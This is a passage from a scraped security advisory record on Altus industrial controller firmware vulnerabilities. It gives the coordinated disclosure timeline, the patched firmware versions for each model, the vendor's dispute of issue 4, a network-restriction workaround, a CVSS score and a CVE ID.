Beijer. Vendor presented initial\n analysis done by the affected companies, also Altus. Preliminary\n plans to fix the vulnerabilities were presented. Altus stated to\n fix issue #1 in January and the other vulnerabilities in March or\n April.\n2021-03-21: Security manager invited SEC Consult to have a status meeting.\n2021-03-25: Altus fixed vulnerability #1. Handover of the advisory handling to\n Altus employees will be done in April. Vendor released fixed\n firmware regarding issue #1.\n2021-04-09: Meeting with Altus. Vendor did not agree with another potentially\n vulnerability, which was identified on the emulated device. Thus,\n it was removed from the advisory. Vulnerabilities #2 and #3 were\n planned to be fixed earlier this year but the releases shifted due\n to Covid. The new firmware version will be released in July 2021.\n2021-04-22: Asked for an update; No answer.\n2021-05-04: Asked for an update.\n2021-05-07: Vendor was working on the security fixes.\n2021-05-11: Vendor sent timeline for fixes and detailed version information.\n Two additional models were added to the affected devices by the\n vendor.\n2021-06-10: Added additional information and asked if more time will be needed.\n2021-06-10: Vendor added affected version numbers and asked for the 1st of\n August as new release date.\n2021-06-15: Set the release date to 1st of August.\n2021-07-28: Vendor sent the version numbers for the fixed firmware and asked\n for postponing the release to 6th of August for completing the\n documentation.\n2021-08-16: Due to holiday, the SEC Consult Vulnerability was closed. Informed\n vendor to release the advisory in the next four days.\n2021-08-17: Received CVE IDs.\n2021-08-18: Informed vendor to release the advisory on 2021-08-19.\n2021-08-19: Coordinated release of security advisory.\n\nSolution:\n---------\nAccording to the vendor the following patches must be applied to fix issue 1),\n2) and 3):\n\nXP300 - v1.11.2.0\nXP315 - v1.11.2.0\nXP325 - v1.11.2.0\nXP340 - v1.11.2.0\nBCS-NX3003 - v1.11.2.0\nBCS-NX3004 - v1.11.2.0\nBCS-NX3005 - v1.11.2.0\nBCS-NX3010 - v1.9.1.0\nBCS-NX3020 - v1.9.1.0\nBCS-NX3030 - v1.9.1.0\nBCS-NX5100 - v1.11.2.0\nBCS-NX5101 - v1.11.2.0\nBCS-NX5110 - v1.11.2.0\nBCS-NX5210 - v1.11.2.0\nBCS-HX3040 - v1.11.2.0\n\nVendor's statement regarding issue 4):\n\"Altus continuously integrates new features and fixes in the products,\nreleasing new firmware versions. Often those improvements require the software\npackages upgrading for several reasons, including security. When this happens,\nwe perform a set of tests to ensure that the performance, reliability, and\nsecurity were not negatively impacted by the upgrades. Although there are known\nvulnerabilities in some software package versions, those vulnerabilities can\nonly be exploited if we compile those specific features and provide the means\nto exploit them. The issue pointed out by SEC Consult, for instance, requires a\nterminal to be exploited, which we don't provide in real hardware. Nowadays,\nthere isn't any known exploitable vulnerability caused by outdated software\npackages in our products. Therefore, this item isn\u2019t considered a vulnerability\nby us.\"\n\n\nWorkaround:\n-----------\nRestrict network access to the device.\n", "sourceHref": "https://0day.today/exploit/36662", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}
CVE-2021-39244
